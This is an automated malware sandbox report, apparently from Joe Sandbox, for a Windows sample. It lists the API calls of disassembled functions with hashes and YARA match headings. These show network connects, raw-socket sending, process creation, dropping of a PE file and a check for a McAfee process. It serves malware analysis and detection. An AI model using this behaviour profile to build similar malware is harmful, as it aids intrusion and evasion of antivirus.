                                                                    • Opcode Fuzzy Hash: 104a1d0a91fd37328b0f045415fccb69181a38f9aa0c3305a1845c4683449357
                                                                    • Instruction Fuzzy Hash: 3811B470804388DEE711CBA8C945BDFBBF8DF15784F00055DE08252686DBB56748C7B2
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00409C5E
                                                                    • memcmp.MSVCRT(?,?,00000006,00000000,00000000,00019000), ref: 00409C8B
                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 00409CF4
                                                                    • memcmp.MSVCRT(?,?,00000006,?,00000000,00000006,00000000,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?), ref: 00409D03
                                                                    • _CxxThrowException.MSVCRT(?,10010AE0), ref: 00409D1F
                                                                    • memcpy.MSVCRT(00000006,00000000,00000004,00000006,00000000,?,00000006,00000000,00000000,00019000), ref: 00409D37
                                                                    • ??2@YAPAXI@Z.MSVCRT(-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 00409D99
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?,00000006,00000000), ref: 00409DA5
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409DFD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,-0000000C,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409E06
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,10010AE0,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409E32
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,10010AE0,?,00000004,?,00000004,00000006,00000004,?,00000006,?,?,00000006,00000000,?), ref: 00409E40
                                                                      • Part of subcall function 00409EB9: memcpy.MSVCRT(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409EF2
                                                                      • Part of subcall function 00409EB9: ??2@YAPAXI@Z.MSVCRT(00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F51
                                                                      • Part of subcall function 00409EB9: memcpy.MSVCRT(00000000,?,00000001,00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006), ref: 00409F60
                                                                      • Part of subcall function 00409EB9: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??3@$memcpy$??2@$memcmp$ExceptionH_prologThrow
                                                                    • String ID:
                                                                    • API String ID: 3363115059-0
                                                                    • Opcode ID: a3a567ef4a5a6548c03163d85bec3885f239d7517735be33c6e457df80fc98d3
                                                                    • Instruction ID: 4c2736c7baf76f3feb491e26631abb7857e55f45f7b795584f27aaa64cf3db6e
                                                                    • Opcode Fuzzy Hash: a3a567ef4a5a6548c03163d85bec3885f239d7517735be33c6e457df80fc98d3
                                                                    • Instruction Fuzzy Hash: 7A516671A00209ABDF14EFA5C9429EF77A9AF48704F40403FF505B72C2DB789E558B99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C82A
                                                                    • htons.WS2_32(100149C4), ref: 0040C83F
                                                                      • Part of subcall function 0040A17B: inet_addr.WS2_32(?), ref: 0040A17F
                                                                      • Part of subcall function 0040A17B: gethostbyname.WS2_32(?), ref: 0040A18D
                                                                    • wsprintfA.USER32 ref: 0040C86A
                                                                    • strlen.MSVCRT ref: 0040C877
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0040C89E
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 0040C8AD
                                                                    • send.WS2_32(00000000,?,?,00000000), ref: 0040C8F2
                                                                    • Sleep.KERNEL32(00000001), ref: 0040C8F9
                                                                    • closesocket.WS2_32(00000000), ref: 0040C905
                                                                    • Sleep.KERNEL32(0000001E), ref: 0040C90D
                                                                    • closesocket.WS2_32(?), ref: 0040C927
                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0040C92F
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleepclosesocket$ExitThreadUserconnectgethostbynamehtonsinet_addrmemsetsendsocketstrlenwsprintf
                                                                    • String ID:
                                                                    • API String ID: 628221110-0
                                                                    • Opcode ID: 2d41cd5358ad072f5562e55cc8da09cd48da758b224140b7f6e7e2fbd0c3a40a
                                                                    • Instruction ID: 09792941f6965b435bd65e26810e53a7ff833e604c8ec5ab3c89db62340472e5
                                                                    • Opcode Fuzzy Hash: 2d41cd5358ad072f5562e55cc8da09cd48da758b224140b7f6e7e2fbd0c3a40a
                                                                    • Instruction Fuzzy Hash: F83174B195032CBAEB109BA0CC89FEE777CEF05754F008161F601A61D1D7B85B858BA9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D537
                                                                    • strlen.MSVCRT ref: 0040D57E
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0040D5AC
                                                                    • memset.MSVCRT ref: 0040D5E4
                                                                    • wsprintfA.USER32 ref: 0040D5FC
                                                                    • memset.MSVCRT ref: 0040D60B
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0040D661
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040D6BB
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040D701
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcpy$CreateEnvironmentExpandProcessStringsstrlenwsprintf
                                                                    • String ID: D
                                                                    • API String ID: 3955990989-2746444292
                                                                    • Opcode ID: c5174d6f4b2b731e8697708b3a9479c48f8d6d603971aa4a800daaf736ce8fc1
                                                                    • Instruction ID: 6bf3195cfd076741d1c62f3d16f3e6d4a0e9c02f18faa6457a942991ae3842b2
                                                                    • Opcode Fuzzy Hash: c5174d6f4b2b731e8697708b3a9479c48f8d6d603971aa4a800daaf736ce8fc1
                                                                    • Instruction Fuzzy Hash: ED515FB2D0021CBEEF109BE4CD89EEB777CEB45349F1044A6F605F6180D6759B898BA4
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C5BD
                                                                      • Part of subcall function 0040A17B: inet_addr.WS2_32(?), ref: 0040A17F
                                                                      • Part of subcall function 0040A17B: gethostbyname.WS2_32(?), ref: 0040A18D
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 0040C5F6
                                                                    • wsprintfA.USER32 ref: 0040C668
                                                                    • inet_addr.WS2_32(00000000), ref: 0040C69A
                                                                    • memcpy.MSVCRT(?,00000045,00000014), ref: 0040C6EF
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014), ref: 0040C701
                                                                    • sendto.WS2_32(?,?,0000041C,00000000,00000002,00000010), ref: 0040C72E
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: inet_addrmemcpy$Socketgethostbynamememsetsendtowsprintf
                                                                    • String ID: E
                                                                    • API String ID: 2644793219-3568589458
                                                                    • Opcode ID: cb87ba47c29b25ab95e5c56f46f58b123389caa2f866df9b24f0b39722c2724f
                                                                    • Instruction ID: bb30138cef0fcda9b6f1e9f293dbdcda00f04fd2ff6ea86282fbc1aa616be411
                                                                    • Opcode Fuzzy Hash: cb87ba47c29b25ab95e5c56f46f58b123389caa2f866df9b24f0b39722c2724f
                                                                    • Instruction Fuzzy Hash: EF5183B1D5035CBAEB119BE4CC85FEE7678AF05304F00116AF204F71D1DBB85A458BAA
                                                                    APIs
                                                                    • SetupDiGetClassDevsA.SETUPAPI(00000000,10012074,00000000,00000006), ref: 004096D5
                                                                    • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 004096FA
                                                                    • LocalFree.KERNEL32(00000000), ref: 00409773
                                                                    • _strcmpi.MSVCRT ref: 004097B1
                                                                    • SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,?,00000014), ref: 004097E2
                                                                    • SetupDiCallClassInstaller.SETUPAPI(00000012,00000000,0000001C), ref: 004097F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Setup$Class$CallDeviceDevsEnumFreeInfoInstallInstallerLocalParams_strcmpi
                                                                    • String ID: 0Lv
                                                                    • API String ID: 1468167468-1912672655
                                                                    • Opcode ID: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
                                                                    • Instruction ID: 8a1ef0a1f766ea71d82b3db24a3f597cfc1408b18940f04f0489504e320b8b10
                                                                    • Opcode Fuzzy Hash: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
                                                                    • Instruction Fuzzy Hash: 74412E72A0022DBEEB119FA1DC84FEF7BBCEB09350F504166F605E2191DB349A45CBA5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041041B
                                                                    • strrchr.MSVCRT ref: 00410425
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 00410446
                                                                    • memset.MSVCRT ref: 00410480
                                                                    • wsprintfA.USER32 ref: 00410498
                                                                    • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 004104B8
                                                                    • memset.MSVCRT ref: 004104D3
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041054A
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410583
                                                                    Strings
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Open$CreateProcesslstrcpystrrchrwsprintf
                                                                    • String ID: D
                                                                    • API String ID: 1521284123-2746444292
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 0040993E
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 0040998F
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040999A
                                                                    • memcpy.MSVCRT(?,?,00000006), ref: 004099CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEventH_prologStartupmemcpy
                                                                    • String ID: A$G$Q$f$f$s
                                                                    • API String ID: 2412012656-2839265054
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Librarystrstr$CloseFreeHandleLoadlstrcmpilstrcpylstrlen
                                                                    • String ID: Mcshield.exe
                                                                    • API String ID: 1409440439-931917054
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(100120D8), ref: 0040DA12
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040DA61
                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040DA7C
                                                                    • memset.MSVCRT ref: 0040DA98
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040DAE0
                                                                    • CloseHandle.KERNEL32(?), ref: 0040DAF3
                                                                    • Sleep.KERNEL32(00000001), ref: 0040DAFE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040DB1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FileFree$CloseCreateHandleLoadSleepWritememset
                                                                    • String ID: MZ
                                                                    • API String ID: 232095334-2410715997
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00411314
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00411329
                                                                    • GetEnvironmentVariableA.KERNEL32(10012D24,?,00000104), ref: 0041133C
                                                                    • ShellExecuteEx.SHELL32(?), ref: 004113A7
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 004113C2
                                                                    • GetCurrentThread.KERNEL32 ref: 004113CD
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 004113D4
                                                                    • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004113E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentNameThread$ChangeEnvironmentExecuteFileModuleNotifyPathPriorityProcessShellShortVariable
                                                                    • String ID: <
                                                                    • API String ID: 199731047-4251816714
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040E8C1
                                                                    • _mbscat.MSVCRT ref: 0040E8D3
                                                                    • _mbscat.MSVCRT ref: 0040E8E4
                                                                    • _mbscat.MSVCRT ref: 0040E8F5
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040E914
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E925
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040E92E
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E940
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040E960
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E96A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File_mbscat$??2@??3@CloseCreateDirectoryHandleReadSizeSystem
                                                                    • String ID:
                                                                    • API String ID: 2093794097-0
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040C9CB
                                                                    • _mbscat.MSVCRT ref: 0040C9DD
                                                                    • _mbscat.MSVCRT ref: 0040C9EE
                                                                    • _mbscat.MSVCRT ref: 0040C9FF
                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0040CA20
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA2E
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040CA42
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040CA56
                                                                    • WriteFile.KERNEL32(?,00000000,00000000), ref: 0040CA83
                                                                    • CloseHandle.KERNEL32(?), ref: 0040CA8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$_mbscat$??2@CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                                    • String ID:
                                                                    • API String ID: 3654042657-0
                                                                    • Opcode ID: 8f5f734768059b5f08da243009e888a70b173ceccb029a8b62737f1ea6f3ba4d
                                                                    • Instruction ID: 4b4febb19f7623747715fdf2f4a8ce1cf6edbbbce5a55fed24a76b456659be86
                                                                    • Opcode Fuzzy Hash: 8f5f734768059b5f08da243009e888a70b173ceccb029a8b62737f1ea6f3ba4d
                                                                    • Instruction Fuzzy Hash: 24217171900228BAEB10EBA5CD89FDA7F7DEB06355F004165F644E6161CB744A948BA4
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,10006B51), ref: 10006D98
                                                                    • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10006DA7
                                                                    • LoadLibraryA.KERNEL32(00000050,?,?,?,10006B51), ref: 10006DE1
                                                                    • realloc.MSVCRT ref: 10006E00
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 10006E59
                                                                    • FreeLibrary.KERNEL32(?,10006B51), ref: 10006E9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressLoadProc$Freerealloc
                                                                    • String ID: IsBadReadPtr$kernel32.dll
                                                                    • API String ID: 343009874-2271619998
                                                                    • Opcode ID: 9edfece79cba95e15e08a13c92d70f32224e10f3ea16ca1e90f40b87946399e3
                                                                    • Instruction ID: da8a72daa7f632914fc606c256c078ce701d9cf95f607820730a43d1e35a25ca
                                                                    • Opcode Fuzzy Hash: 9edfece79cba95e15e08a13c92d70f32224e10f3ea16ca1e90f40b87946399e3
                                                                    • Instruction Fuzzy Hash: C9410875A0031AEFEB50CF64CC84B9ABBB5FF083D4F218065E909A7254D734E950CB90
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000170), ref: 100056DE
                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10005711
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10005734
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10005746
                                                                    • strlen.MSVCRT ref: 10005753
                                                                    • wsprintfA.USER32 ref: 10005777
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10005790
                                                                      • Part of subcall function 100054CF: memset.MSVCRT ref: 100054EB
                                                                      • Part of subcall function 100054CF: strlen.MSVCRT ref: 10005532
                                                                      • Part of subcall function 100054CF: memset.MSVCRT ref: 10005598
                                                                      • Part of subcall function 100054CF: wsprintfA.USER32 ref: 100055B0
                                                                      • Part of subcall function 100054CF: memset.MSVCRT ref: 100055BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Filestrlenwsprintf$CloseCreateHandleWritelstrcpymemcpy
                                                                    • String ID: %s %s
                                                                    • API String ID: 1942971391-2939940506
                                                                    • Opcode ID: 06c2e90de353c534267921f2c978eeea5a158a7e0c7070a1faffab6799a03352
                                                                    • Instruction ID: df5e23c000e03a25dc9f69d28642bfb876d77e7272fd59ee277a9363454fddfc
                                                                    • Opcode Fuzzy Hash: 06c2e90de353c534267921f2c978eeea5a158a7e0c7070a1faffab6799a03352
                                                                    • Instruction Fuzzy Hash: 8431787250421DBAF750D7A4DC89FDB77BCDB05396F400562F609E2085EA31AE849B60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscpymemcpymemsetstrchrstrlen
                                                                    • String ID: .
                                                                    • API String ID: 1359815026-248832578
                                                                    • Opcode ID: 90e9dd46989f3b416236049e815e2126ee62ad742a5d0101ea50c0d0ef0d97c6
                                                                    • Instruction ID: 91cf6bfb0bb8575cc0dd6624110da73219ea2829cdee16e04117afdf4891bad6
                                                                    • Opcode Fuzzy Hash: 90e9dd46989f3b416236049e815e2126ee62ad742a5d0101ea50c0d0ef0d97c6
                                                                    • Instruction Fuzzy Hash: 9221D872904258BBCB10DFA9CD859DE3B68DB14344F1004BBF984E7243D7B89BD587A9
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_0000AF24,1000D460,000000FF,?,1000A02F,00000000), ref: 1000A1D4
                                                                    • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000A1E9
                                                                    • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000A1F5
                                                                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000A201
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                                                    • API String ID: 2238633743-3711086354
                                                                    • Opcode ID: ee8e47de5e59c45fce1fd1b93c555b8d1c0c13caf1cf6bbbe7368570f378d32c
                                                                    • Instruction ID: 1babc23fd8af8267a13775e70e8c95c559f03c610a7b34632bd0960902c24a4b
                                                                    • Opcode Fuzzy Hash: ee8e47de5e59c45fce1fd1b93c555b8d1c0c13caf1cf6bbbe7368570f378d32c
                                                                    • Instruction Fuzzy Hash: 2E116D75D00229EBEB11DBA9DC45ADDBBB8FB09690F114236F611B2294DB755C40CBA0
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 0040A54D
                                                                    • memset.MSVCRT ref: 0040A55C
                                                                    • htons.WS2_32(100149C4), ref: 0040A571
                                                                    • inet_addr.WS2_32(10014E04), ref: 0040A580
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040A597
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 0040A5A6
                                                                    • Sleep.KERNEL32(00000028), ref: 0040A5AE
                                                                    • closesocket.WS2_32(00000000), ref: 0040A5B5
                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0040A5C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrmemsetsocket
                                                                    • String ID:
                                                                    • API String ID: 1335291643-0
                                                                    • Opcode ID: 622480f561da35962a2c343ab3763b015d1daaf266a5c8a429c3554f02ec77bc
                                                                    • Instruction ID: 55a79132d35615ca5f3d33928472b37ce0bebb47fc6d5ab29329d61f566ee789
                                                                    • Opcode Fuzzy Hash: 622480f561da35962a2c343ab3763b015d1daaf266a5c8a429c3554f02ec77bc
                                                                    • Instruction Fuzzy Hash: 5E015E7191133CBEFB10ABA09CCDEEF7B6CFB05780F448015F501961A5DBB44A448B66
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10002501
                                                                    • memset.MSVCRT ref: 10002510
                                                                    • htons.WS2_32(00000000), ref: 10002525
                                                                    • inet_addr.WS2_32(10014E04), ref: 10002534
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 1000254B
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 1000255A
                                                                    • Sleep.KERNEL32(00000028), ref: 10002562
                                                                    • closesocket.WS2_32(00000000), ref: 10002569
                                                                    • ExitThread.KERNEL32 ref: 10002579
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitSleepStartupThreadclosesocketconnecthtonsinet_addrmemsetsocket
                                                                    • String ID:
                                                                    • API String ID: 109928169-0
                                                                    • Opcode ID: 32e45b2445eb45400c0e7842ad5c74366bb545e8f0b6857efa875fc29e1fba7e
                                                                    • Instruction ID: 4b2411be4bb37ce7fb2a3ebd424c13f522f9c6df664b858043338d1c5bb194b9
                                                                    • Opcode Fuzzy Hash: 32e45b2445eb45400c0e7842ad5c74366bb545e8f0b6857efa875fc29e1fba7e
                                                                    • Instruction Fuzzy Hash: 1A015E7195136CBAFB00ABA09CCDEEA7A6CFB06381F448115F501961A5DB744A448B65
                                                                    APIs
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1A3
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1B5
                                                                      • Part of subcall function 0040F177: wsprintfA.USER32 ref: 0040F25B
